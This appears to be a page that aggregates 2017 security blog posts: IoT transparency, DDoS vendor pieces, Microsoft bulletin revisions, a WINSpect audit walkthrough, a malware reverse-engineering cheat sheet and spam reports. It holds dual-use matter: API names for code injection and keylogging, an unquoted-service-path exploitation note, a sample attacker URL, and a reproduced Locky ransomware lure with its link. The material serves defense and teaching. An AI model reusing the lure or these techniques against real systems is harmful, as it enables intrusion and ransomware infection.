    When IoT vendors say they offer “lifetime support,” it is not your life, or the product’s life. It is the life of the company. We saw this with Revolv last year. Guaranteeing a certain number of years of product focus, updates, community support (e.g., forums), as well as guaranteeing that the device will work, is paramount. This means tracking the life cycle of the technology inside the devices, and ensuring whatever cloud services are being used will still be there and cannot be interrupted or hijacked afterwards.
  2. Privacy and data handling transparency
    Inform the consumer where the data is being saved (i.e., in which physical country), how long the data will be kept, as well as what data is being saved and to what level of detail. Give the consumer the option to remove all data produced by the device if they can prove ownership of the device. I have no problem waiving some of my rights when telling the IoT vendor, and potentially the world, that I like to make something that needs the pizza setting of my IoT oven on Sunday morning, but inform me first. Will my data go to a European cloud or a US cloud, and what laws can be enforced upon my data and the correlation based on my data?
  3. Technology transparency
    To the extent possible, inform the consumer about what technology is being used, with regard to e.g. open source software and licensed software. Food manufacturers have to ensure the correct labeling of their product as far as ingredients go. Why not do the same for technology, for the individual parts or software components, at least to some extent, so that consumers can make informed choices about what it is they can and want to use?
  4. Security feature transparency
    Does the product allow management through a cloud service with two-factor authentication? Or only Bluetooth or Wi-Fi? Will it detect your neighbor trying to log on to your device? Can someone break into my device remotely? What kind of features the device has will hopefully, in the future, start influencing the buying behavior of the consumer. If you want all devices to only use the cloud for remote control, then that should be a choice that can be made by looking at the box.
  5. Planned obsolescence
    A more difficult one, but an important one. For IoT that is more sensitive or even vital, a shutdown process should be explored, to be able to shut down the device when it has exceeded its life or has been declared end of life. When reliance becomes dependence, planning is required to ensure that the benefits and added value of the product can be sustained. This is easier with pacemakers and other devices that receive a lot of care and tracking. But for other devices that are basically enable-and-forget, this implies being able to signal the remaining lifetime to the owner, and thus implies knowing who the owner is. This last part might be a more difficult issue, as it has been tried with, for example, tying domain names to people for the purpose of reporting abuse cases. Not only that, this would mean another potential privacy problem if the information is leaked. This is a sensitive topic, but more discussion is needed to see how devices can be categorized and what the possibilities are. This can also lead to abuse from the vendor side: printer vendors were very quick to jump on the planned-obsolescence track, flagging printer ink cartridges as empty early to force the customer to buy more. More discourse on this subject is needed from all sides: designers, vendors, suppliers and consumers.

DDoS Attacks on Internet Providers Can Impact Downstream Customers

Enterprises need to consider that even if they have protection against distributed denial of service (DDoS) attacks, their business could be taken offline if their Internet Service Provider (ISP), hosting provider or Domain Name Service (DNS) provider does not have adequate DDoS protection. ISPs and hosting providers are attractive DDoS targets for hackers, because the impacts are far-ranging; think of it in terms of hitting several birds with one stone. That’s why it’s crucial to do your research when it comes to choosing your providers.

Direct vs. Indirect Hits

Hackers sometimes target a hosting provider or ISP directly, as was the case a couple of weeks ago in late August, when DreamHost was directly hit by a DDoS attack, resulting in several hours of downtime for its customers. Another example of a direct hit was in October 2016, when the Domain Name Service provider Dyn suffered a mega DDoS attack. Both incidents show that an attack on an Internet gateway can spell trouble for any of its customers downstream, and there are many more such examples. The volumetric attacks make headlines and raise eyebrows; however, many providers experience several low-threshold DDoS attacks each day. Even if hackers launch a low-threshold attack on a provider, it can result in network “noise” and degraded service for downstream customers.

Even an indirect hit, i.e., an attack on one of a hosting provider’s enterprise customers, can cause collateral damage to other customers using the service. If a hacker succeeds in launching a several-hundred-gigabit DDoS attack to take a website offline, it will almost certainly affect customers who co-reside on, or rely on, the infrastructure transporting the attack; that’s collateral damage.

Potential Effect on Business

As part of their service level agreements (SLAs), many hosting providers offer 99.9% (or even 99.999%) uptime. However, even 1% downtime can dramatically affect a business. In the event of downtime, some providers offer compensation, such as a credit to the customer’s account, usually a percentage of the monthly fee. However, that credit might not outweigh the downtime cost to the tenant; if a business website is down, that usually means that clients or customers can’t find the business online or access its products/services. This usually results in loss of revenue, and damage to brand/reputation.

Be aware that not all ISPs and hosting providers are equal when it comes to DDoS protection. When shopping for a 3rd party ISP or hosting service, ask the right questions. Ask if they have a dedicated, in-line automated DDoS mitigation appliance at the peering and transit points that blocks all DDoS traffic from entering their network. Corero technology enables real-time, algorithmic identification of network anomalies and subsequent mitigation of the attack traffic, eliminating the DDoS attacks before they can traverse the network and impact downstream customers. Also ask whether they offer DDoS Protection Services (increasingly, many of them do offer this service, either as a value-added service or for a premium.)

For more information, contact us.

Hack Naked News #140 – September 12, 2017

Bypassing Windows 10 security software, Android is vulnerable (go figure), hacking syringe infusion pumps to deliver fatal doses, and more. Jason Wood of Paladin Security discusses iOS 11 on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode140
Visit https://www.securityweekly.com for all the latest episodes!

MS16-039 – Critical: Security Update for Microsoft Graphics Component (3148522) – Version: 4.0

Severity Rating: Critical
Revision Note: V4.0 (September 12, 2017): Revised the Microsoft Windows affected software table to include Windows 10 Version 1703 for 32-bit Systems and Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-0165. Consumers running Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Windows, Microsoft .NET Framework, Microsoft Office, Skype for Business, and Microsoft Lync. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted document or visits a webpage that contains specially crafted embedded fonts.

MS16-095 – Critical: Cumulative Security Update for Internet Explorer (3177356) – Version: 3.0

Severity Rating: Critical
Revision Note: V3.0 (September 12, 2017): Revised the Affected Software table to include Internet Explorer 11 installed on Windows 10 Version 1703 for 32-bit Systems and Internet Explorer 11 installed on Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-3326. Consumers using Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Internet Explorer on Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability. Customers who are running other versions of Windows 10 and who have installed the June cumulative updates do not need to take any further action.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-123 – Important: Security Update for Windows Kernel-Mode Drivers (3192892) – Version: 3.0

Severity Rating: Important
Revision Note: V3.0 (September 12, 2017): Revised the Affected Software table to include Windows 10 Version 1703 for 32-bit Systems and Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-3376. Consumers using Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.

MS16-087 – Critical: Security Update for Windows Print Spooler Components (3170005) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (September 12, 2017): To address known issues with the 3170455 update for CVE-2016-3238, Microsoft has made available the following updates for currently-supported versions of Microsoft Windows:
  • Rereleased update 3170455 for Windows Server 2008
  • Monthly Rollup 4038777 and Security Update 4038779 for Windows 7 and Windows Server 2008 R2
  • Monthly Rollup 4038799 and Security Update 4038786 for Windows Server 2012
  • Monthly Rollup 4038792 and Security Update 4038793 for Windows 8.1 and Windows Server 2012 R2
  • Cumulative Update 4038781 for Windows 10
  • Cumulative Update 4038781 for Windows 10 Version 1511
  • Cumulative Update 4038782 for Windows 10 Version 1607 and Windows Server 2016
Microsoft recommends that customers running Windows Server 2008 reinstall update 3170455, and that customers running other supported versions of Windows install the appropriate update. See Microsoft Knowledge Base Article 3170005 (https://support.microsoft.com/en-us/help/3170005) for more information.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow remote code execution if an attacker is able to execute a man-in-the-middle (MiTM) attack on a workstation or print server, or sets up a rogue print server on a target network.

Toolsmith Tidbit: Windows Auditing with WINspect

WINSpect recently hit the toolsmith radar screen via Twitter, and the author, Amine Mehdaoui, just posted an update a couple of days ago, so no time like the present to give you a walk-through. WINSpect is a PowerShell-based Windows Security Auditing Toolbox. According to Amine's GitHub README, WINSpect "is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined windows machines. However, some of the functions still apply for standalone workstations."
The current script feature set includes audit checks and enumeration for:

  • Installed security products
  • World-exposed local filesystem shares
  • Domain users and groups with local group membership
  • Registry autoruns
  • Local services that are configurable by Authenticated Users group members
  • Local services for which corresponding binary is writable by Authenticated Users group members
  • Non-system32 Windows Hosted Services and their associated DLLs
  • Local services with unquoted path vulnerability
  • Non-system scheduled tasks
  • DLL hijackability
  • User Account Control settings
  • Unattended installs leftovers
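
WINSpect itself is written in PowerShell, but the logic behind one of these checks, the unquoted-service-path vulnerability, is simple enough to sketch (here in Python; the function name and example paths are mine):

```python
def has_unquoted_path_issue(image_path: str) -> bool:
    # A service's image path is exploitable when it is unquoted and the
    # path to the executable contains spaces: Windows will try
    # "C:\Program.exe", then "C:\Program Files\My.exe", and so on,
    # before reaching the real binary.
    path = image_path.strip()
    if path.startswith('"'):
        return False                      # properly quoted: not vulnerable
    end = path.lower().find(".exe")
    exe = path[:end + 4] if end != -1 else path
    return " " in exe                     # space before the executable name

assert has_unquoted_path_issue(r"C:\Program Files\My App\svc.exe -k run")
assert not has_unquoted_path_issue(r'"C:\Program Files\My App\svc.exe" -k run')
assert not has_unquoted_path_issue(r"C:\Windows\system32\svchost.exe -k netsvcs")
```

An attacker who can write to `C:\` or `C:\Program Files\` can plant a binary at one of the earlier lookup locations and have it run with the service's privileges.
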
I can see this useful PowerShell script coming in quite handy for assessment using the CIS Top 20 Security Controls. I ran it on my domain-joined Windows 10 Surface Book via a privileged PowerShell and liked the results.


The script confirms that it's running with admin rights, checks the PowerShell version, then inspects Windows Firewall settings. Looking good on the firewall, and WINSpect tees right off on my Windows Defender instance and its configuration as well.
Not sharing a screenshot of my shares or admin users, sorry, but you'll find them enumerated when you run WINSpect.


 WINSpect then confirmed that UAC was enabled, and that it should notify me only when apps try to make changes, then checked my registry for autoruns; no worries on either front, all confirmed as expected.


WINSpect wrapped up with a quick check of configurable services. SMSvcHost is normal as part of .NET, even if I don't like it, but flowExportService doesn't need to be there at all; I removed that a while ago after being really annoyed with it during testing. No user-hosted services, and DLL Safe Search is enabled...bonus. Finally, no unattended-install leftovers, and all the scheduled tasks are normal for my system. Sweet, pretty good overall, thanks WINSpect. :-)

Give it a try for yourself, and keep an eye out for updates. Amine indicates that Local Security Policy controls, administrative shares configs, loaded DLLs, established/listening connections, and exposed GPO scripts are on the to-do list.
Cheers...until next time.

Tips for Reverse-Engineering Malicious Code

This cheat sheet outlines tips for reversing malicious Windows executables via static and dynamic code analysis with the help of a debugger and a disassembler. To print it, use the one-page PDF version; you can also edit the Word version to customize it for your own needs.

Overview of the Code Analysis Process

  1. Examine static properties of the Windows executable for initial assessment and triage.
  2. Identify strings and API calls that highlight the program’s suspicious or malicious capabilities.
  3. Perform automated and manual behavioral analysis to gather additional details.
  4. If relevant, supplement your understanding by using memory forensics techniques.
  5. Use a disassembler for static analysis to examine code that references risky strings and API calls.
  6. Use a debugger for dynamic analysis to examine how risky strings and API calls are used.
  7. If appropriate, unpack the code and its artifacts.
  8. As your understanding of the code increases, add comments, labels; rename functions, variables.
  9. Progress to examine the code that references or depends upon the code you’ve already analyzed.
  10. Repeat steps 5-9 above as necessary (the order may vary) until analysis objectives are met.
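
Step 2 above can start with something as simple as a `strings`-style scan; a minimal Python sketch (illustrative only, not a replacement for proper tooling; the sample bytes are made up):

```python
import re

def ascii_strings(data: bytes, min_len: int = 5):
    # Extract runs of printable ASCII, like the classic `strings` utility;
    # API names, URLs and file paths embedded in a binary usually surface
    # this way during initial triage.
    return [m.group().decode()
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

sample = b"\x00MZ\x90\x00http://evil.example/payload\x00VirtualAllocEx\x00\xff"
assert ascii_strings(sample) == ["http://evil.example/payload", "VirtualAllocEx"]
```

Packed samples often show few meaningful strings until after unpacking (step 7), which is itself a useful signal.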

Common 32-Bit Registers and Uses

EAX Addition, multiplication, function results
ECX Counter; used by LOOP and others
EBP Baseline/frame pointer for referencing function arguments (EBP+value) and local variables (EBP-value)
ESP Points to the current “top” of the stack; changes via PUSH, POP, and others
EIP Instruction pointer; points to the next instruction; shellcode gets it via call/pop
EFLAGS Contains flags that store outcomes of computations (e.g., Zero and Carry flags)
FS F segment register; FS[0] points to SEH chain, FS[0x30] points to the PEB.

Common x86 Assembly Instructions

mov EAX,0xB8 Put the value 0xB8 in EAX.
push EAX Put EAX contents on the stack.
pop EAX Remove contents from the top of the stack and put them in EAX.
lea EAX,[EBP-4] Put the address of variable EBP-4 in EAX.
call EAX Call the function whose address resides in the EAX register.
add esp,8 Increase ESP by 8 to shrink the stack by two 4-byte arguments.
sub esp,0x54 Shift ESP by 0x54 to make room on the stack for local variable(s).
xor EAX,EAX Set EAX contents to zero.
test EAX,EAX Check whether EAX contains zero, set the appropriate EFLAGS bits.
cmp EAX,0xB8 Compare EAX to 0xB8, set the appropriate EFLAGS bits.

Understanding 64-Bit Registers

  • EAX→RAX, ECX→RCX, EBX→RBX, ESP→RSP, EIP→RIP
  • Additional 64-bit registers are R8-R15.
  • RSP is often used to access stack arguments and local variables, instead of EBP.
  • |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| R8 (64 bits)
    ________________________________|||||||||||||||||||||||||||||||| R8D (32 bits)
    ________________________________________________|||||||||||||||| R8W (16 bits)
    ________________________________________________________|||||||| R8B (8 bits)
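
The diagram above says the narrower forms are just the low-order slices of the full 64-bit register, which masking reproduces directly (values are illustrative):

```python
r8 = 0x1122334455667788

r8d = r8 & 0xFFFFFFFF   # low 32 bits
r8w = r8 & 0xFFFF       # low 16 bits
r8b = r8 & 0xFF         # low 8 bits

assert hex(r8d) == "0x55667788"
assert hex(r8w) == "0x7788"
assert hex(r8b) == "0x88"
```

One asymmetry worth remembering: on x86-64, writing the 32-bit form (e.g. `mov r8d, 1`) zero-extends into the full 64-bit register, while writes to the 16- and 8-bit forms leave the upper bits untouched.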

Passing Parameters to Functions

arg0 [EBP+8] on 32-bit, RCX on 64-bit
arg1 [EBP+0xC] on 32-bit, RDX on 64-bit
arg2 [EBP+0x10] on 32-bit, R8 on 64-bit
arg3 [EBP+0x14] on 32-bit, R9 on 64-bit

Decoding Conditional Jumps

JA / JG Jump if above/jump if greater.
JB / JL Jump if below/jump if less.
JE / JZ Jump if equal; same as jump if zero.
JNE / JNZ Jump if not equal; same as jump if not zero.
JGE / JNL Jump if greater or equal; same as jump if not less.
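
The above/below mnemonics compare unsigned values while greater/less compare signed ones, so the same bit pattern can branch differently; a Python sketch of the distinction (the helper name is mine):

```python
def to_signed32(x: int) -> int:
    # Reinterpret a 32-bit value as two's-complement signed.
    return x - 0x100000000 if x & 0x80000000 else x

a, b = 0xFFFFFFFF, 1

# JA (unsigned "above"): 0xFFFFFFFF is 4294967295, far above 1.
ja_taken = a > b
# JG (signed "greater"): the same bits read as -1, which is less than 1.
jg_taken = to_signed32(a) > to_signed32(b)

assert ja_taken and not jg_taken
```

Mixing the two up is a classic source of both analyst confusion and exploitable integer bugs.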

Some Risky Windows API Calls

  • Code injection: CreateRemoteThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, EnumProcesses
  • Dynamic DLL loading: LoadLibrary, GetProcAddress
  • Memory scraping: CreateToolhelp32Snapshot, OpenProcess, ReadProcessMemory, EnumProcesses
  • Data stealing: GetClipboardData, GetWindowText
  • Keylogging: GetAsyncKeyState, SetWindowsHookEx
  • Embedded resources: FindResource, LockResource
  • Unpacking/self-injection: VirtualAlloc, VirtualProtect
  • Query artifacts: CreateMutex, CreateFile, FindWindow, GetModuleHandle, RegOpenKeyEx
  • Execute a program: WinExec, ShellExecute, CreateProcess
  • Web interactions: InternetOpen, HttpOpenRequest, HttpSendRequest, InternetReadFile
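
As a sketch of how such a list gets used during triage (a hypothetical helper, not part of any named tool): cross-reference the strings or imports extracted from a sample against the API names above, and let the hits guide where to focus disassembly first.

```python
# A small subset of the risky API names listed above, grouped for triage.
RISKY_APIS = {
    "CreateRemoteThread", "WriteProcessMemory", "VirtualAllocEx",
    "LoadLibrary", "GetProcAddress", "SetWindowsHookEx",
    "GetAsyncKeyState", "InternetOpen", "HttpSendRequest",
}

def flag_risky(strings):
    # Return the extracted strings that match known risky API names.
    return sorted(s for s in strings if s in RISKY_APIS)

found = flag_risky(["printf", "VirtualAllocEx", "SetWindowsHookEx", "exit"])
assert found == ["SetWindowsHookEx", "VirtualAllocEx"]
```

A hit is a lead, not a verdict: legitimate software uses many of these APIs too, which is why step 5 of the process (examining the code that references them) follows.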

Additional Code Analysis Tips

  • Be patient but persistent; focus on small, manageable code areas and expand from there.
  • Use dynamic code analysis (debugging) for code that’s too difficult to understand statically.
  • Look at jumps and calls to assess how the specimen flows from one “interesting” code block to another.
  • If code analysis is taking too long, consider whether behavioral or memory analysis will achieve the goals.
  • When looking for API calls, know the official API names and the associated native APIs (Nt, Zw, Rtl).

Post-Scriptum

Authored by Lenny Zeltser with feedback from Anuj Soni. Malicious code analysis and related topics are covered in the SANS Institute course FOR610: Reverse-Engineering Malware, which they’ve co-authored. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

Enterprise Security Weekly #60 – Live From Gainesville

Don Pezet of ITProTV and Doug White join us to discuss network security architecture. In the news, SealPath and Boldon James join forces, following the money, AI in the cloud, and more on this episode of Enterprise Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/ES_Episode60
Visit https://www.securityweekly.com for all the latest episodes!

DDoS Attack Temporarily Folds Major Poker Game Site

Late last week Americas Cardroom’s Winning Poker Network (WPN), a major online gaming site, was hit with a ransom denial of service (RDoS) attack that lasted a few days. This was not the first DDoS attack that the company experienced; actually, it was the fourth such attack since 2014. Incidents like this are prime examples of how DDoS attacks result in loss of revenue and customer trust; the company was forced to temporarily cancel all its tournaments and issue refunds.

The gaming industry is frequently targeted by DDoS attacks, in part because they do such damage to a gaming company’s bottom line and reputation. Timing is critical in online gaming, so it makes sense that gamers don’t like website latency. Unhappy gamers easily take their gaming or gambling money elsewhere. It’s no surprise that the hackers demanded a ransom from WPN in exchange for ceasing the attack; a DDoS attack is powerful leverage. However, the WPN CEO was wise not to cave in to the criminal demand, since paying would only have rewarded the bad behavior and encouraged those hackers, and others, to follow suit (pun intended).

To prevent future DDoS or RDoS attacks, WPN should “up the ante” in terms of its DDoS protection. Now more than ever, DDoS protection is affordable, scalable and flexible. Companies can host a DDoS protection appliance on-premises, or take a hybrid approach that combines an appliance with a cloud scrubbing solution or outsourced protection via their Internet Service Provider or hosting provider. Modern DDoS protection services are a game-changing opportunity for the gaming industry. After four bouts with DDoS hackers, WPN can certainly find a solution that solves its problem; you can bet on that.

For more information, contact us.

Quit Talking About "Security Culture" – Fix Org Culture!

I have a pet peeve. Ok, I have several, but nonetheless, we're going to talk about one of them today. That pet peeve is security professionals wasting time and energy pushing a "security culture" agenda. This practice of talking about "security culture" has arisen over the past few years. It largely comes from security awareness circles, though that's not always the case (looking at you, anti-phishing vendors intent on selling products without the means and methodology to make them truly useful!).

I see three main problems with references to "security culture," not the least of which being that it continues the bad old practices of days gone by.

1) It's Not Analogous to Safety Culture

First and foremost, you're probably sitting there grinding your teeth saying "But safety culture initiatives work really well!" Yes, they do, but here's why: safety culture can - and often does - achieve a zero-incident outcome. That is to say, you can reduce safety incidents to ZERO. That fact is excellent news when you're around construction sites or going to the hospital. However, I have very bad news for you. Information (or cyber, or computer) security will never get to zero incidents. Until the entirety of computing is revolutionized, removing humans from the equation, you will never prevent all incidents. Just imagine your "security culture" sign by the entrance to your local office environment, forever emblazoned with "It Has Been 0 Days Since Our Last Incident." That's not healthy or encouraging. That sort of thing would be outright demoralizing!

Since you can't be 100% successful through preventative security practices, you must then shift your mindset to two things: better decisions and resilience. Your focus - which most "security culture" programs are trying to address, or should be - is helping people make better decisions. Well, I should say, some of you - the few, the proud, the quietly isolated - have this focus. But at the end of the day/week/month/year you'll find that people - including well-trained and highly technical people - will still make mistakes or bad decisions, which means you can't bank on "solving" infosec through better decisions alone.

As a result, we must still architect for resiliency. We must assume something will break down at some point, resulting in an incident. When that incident occurs, we must be able to absorb the fault and continue to operate despite degraded conditions, while recovering to "normal" as quickly, efficiently, and effectively as possible. Note, however, that this focus on resiliency doesn't align well with the "security culture" message. It's akin to telling people "Safety is really important, but since we have no faith in your ability to be safe, here's a first aid kit." (Yes, that's a bit harsh, to prove a point, which hopefully you're getting.)

2) Once Again, It Creates an "Other"

One of the biggest problems with a typical "security culture" focus is that it once again creates the wrong kind of enablement culture. It says "we're from infosec and we know best - certainly better than you." Why should people work to make better decisions when they can just abdicate that responsibility to infosec? Moreover, since we're trying to optimize resiliency, people can go ahead and make mistakes, no big deal, right?

Part of this is ok, part of it is not. On the one hand, from a DevOps perspective, we want people to experiment, be creative, be innovative. In this sense, resilience and failure are a good thing. However, note that in DevOps, the responsibility for "fail fast, recover fast, learn fast" is on the person doing the experimenting!!! The DevOps movement is diametrically opposed to fostering enablement cultures where people (like developers) don't feel the pain from their bad decisions. It's imperative that people have ownership and responsibility for the things they're doing. Most "security culture" dogma I've seen and heard works against this objective.

We want enablement, but we don't want enablement culture. We want "freedom AND responsibility," "accountability AND transparency," etc, etc, etc. Pushing "security culture" keeps these initiatives separate from other organizational development initiatives, and more importantly it tends to have at best a temporary impact, rather than triggering lasting behavioral change.

3) Your Goal Is Improving the Organization

The last point here is that your goal should be to improve the organization and the overall organizational culture. It should not be focused on point-in-time blips that come and go. Additionally, your efforts must be aimed toward lasting impact and not be anchored around a cult of personality.

As a starting point, you should be working with org dev personnel within your organization, applying behavior design principles. You should be identifying what the target behavior is, then working backward in a piecemeal fashion to determine whether that behavior can be evoked and institutionalized through one step or multiple steps. It may even take years to accomplish the desired changes.

Another key reason for working with your org dev folks is because you need to ensure that anything "culture" that you're pursuing is fully aligned with other org culture initiatives. People can only assimilate so many changes at once, so it's often better to align your work with efforts that are already underway in order to build reinforcing patterns. The worst thing you can do is design for a behavior that is in conflict with other behavior and culture designs underway.

All of this is to underline the key point that "security culture" is the wrong focus, and can in some cases even detract from other org culture initiatives. You want to improve decision-making, but you have to do this one behavior at a time, and glossing over it with the "security culture" label is unhelpful.

Lastly, you need to think about your desired behavior and culture improvements in the broader context of organizational culture. Do yourself a favor and go read Laloux's Reinventing Organizations for an excellent treatise on a desirable future state (one that aligns extremely well with DevOps). As you read Laloux, think about how you can design for security behaviors in a self-managed world. That's the lens through which you should view things, and this is where you'll realize a "security culture" focus is at best distracting.

---
So... where should you go from here? The answer is three-fold:
1) Identify and design for desirable behaviors
2) Work to make those behaviors easy and sustainable
3) Work to shape organizational culture as a whole

Definitionally, here are a couple of starters for you...

First, per Fogg, Behavior happens when three things come together: Motivation, Ability (how hard or easy it is to do the action), and a Trigger (a prompt or cue). When Motivation is high and it's easy to do, then it doesn't take much prompting to trigger an action. However, if it's difficult to take the action, or the motivation simply isn't there, you must then start looking for ways to address those factors in order to achieve the desired behavioral outcome once triggered. This is the basis of behavior design.
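To make Fogg's model concrete, here is a toy sketch of that formulation. The 0-to-1 scores and the activation threshold are invented for illustration; they are not part of Fogg's actual work:

```python
def behavior_occurs(motivation, ability, trigger_present, threshold=0.5):
    """Fogg-style sketch: a prompted behavior fires when the combination of
    Motivation and Ability (each scored 0..1 here) clears a threshold.
    The scales and threshold are illustrative assumptions, not Fogg's numbers."""
    if not trigger_present:
        # Without a trigger (prompt/cue), no action occurs, however motivated.
        return False
    return motivation * ability >= threshold

# High motivation and an easy action: even a weak prompt suffices.
print(behavior_occurs(0.9, 0.8, trigger_present=True))   # True
# Same motivation, but the action is hard: the behavior never fires.
print(behavior_occurs(0.9, 0.2, trigger_present=True))   # False
```

The security-behavior implication: if a desired behavior isn't happening, it is often cheaper to raise Ability (make the secure path easier) than to try to manufacture Motivation.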

Second, when you think about culture, think of it as the aggregate of behaviors collectively performed by the organization, along with the values the organization holds. It may be helpful, as Laloux suggests, to think of the organization as its own person that has intrinsic motivations, values, and behaviors. Eliciting behavior change from the organization is, then, tantamount to changing the organizational culture.

If you put this all together, I think you'll agree with me that talking about "security culture" is anathema to the desired outcomes. Thinking about behavior design in the context of organizational culture shift will provide a better path to improvement, while also making it easier to explain the objectives to non-security people and to get buy-in on lasting change.

Bonus reference: You might find this article interesting as it pertains to evoking behavior change in others.

Good luck!

QTUM Cryptocurrency spam

This spam email appears to have been sent by the Necurs botnet, advertising a new Bitcoin-like cryptocurrency called QTUM. Necurs is often used to pump out malware, pharma and dating spam, and sometimes stock pump-and-dump schemes. There is no guarantee that this is actually being sent by the people running QTUM; it could simply be a Joe Job to disrupt operations. Given some of the wording alluding to illegal

Hack Naked News #139 – September 5, 2017

AT&T customers at risk, WikiLeaks gets vandalized, catching hackers in the act, going to jail over VPNs, and more. Jason Wood of Paladin Security discusses wheeling and dealing malware on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode139

Visit https://www.securityweekly.com for all the latest episodes!

Malware spam: "Scanning" pretending to be from tayloredgroup.co.uk

This spam email pretends to be from tayloredgroup.co.uk but it is just a simple forgery leading to Locky ransomware. There is both a malicious attachment and a link in the body text. The name of the sender varies.

Subject: Scanning
From: "Jeanette Randels" [Jeanette.Randels@tayloredgroup.co.uk]
Date: Thu, May 18, 2017 8:26 pm

https://dropbox.com/file/9A30AA

-- Jeanette Randels

Startup Security Weekly #53 – Pulling Your G-String

Matt Alderman of Automox joins us. In the news, changing your audience’s perceptions, improving sales efforts, letting your kids fail, and updates from Facebook, Juniper, Qadium, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode53

Visit https://www.securityweekly.com for all the latest episodes!

QOTD – On Learning (New Things)

The further along you are in your career, the easier it is to fall back on the mistaken assumption that you’ve made it and have all the skills you need to succeed. The tendency is to focus all your energy on getting the job done, assuming that the rest will take care of itself. Big mistake.
[...]
The primary takeaway from Dweck’s research is that we should never stop learning. The moment we think that we are who we are is the moment we give away our unrealized potential.
[...]
The act of learning is every bit as important as what you learn. Believing that you can improve yourself and do things in the future that are beyond your current possibilities is exciting and fulfilling.
 -- Dr. Travis Bradberry, Coauthor of Emotional Intelligence 2.0 & President at TalentSmart

Src: These are the skills you should learn that will pay off forever | World Economic Forum

Paul’s Security Weekly #528 – DDos Campaign for Memes

Larry Pesce and Dave Kennedy hold down the fort in Paul’s absence! Kyle Wilhoit of DomainTools delivers a tech segment on pivoting off domain information, Dave talks about the upcoming DerbyCon, and we discuss the latest information security news!

Full Show Notes: https://wiki.securityweekly.com/Episode528

Visit https://www.securityweekly.com for all the latest episodes!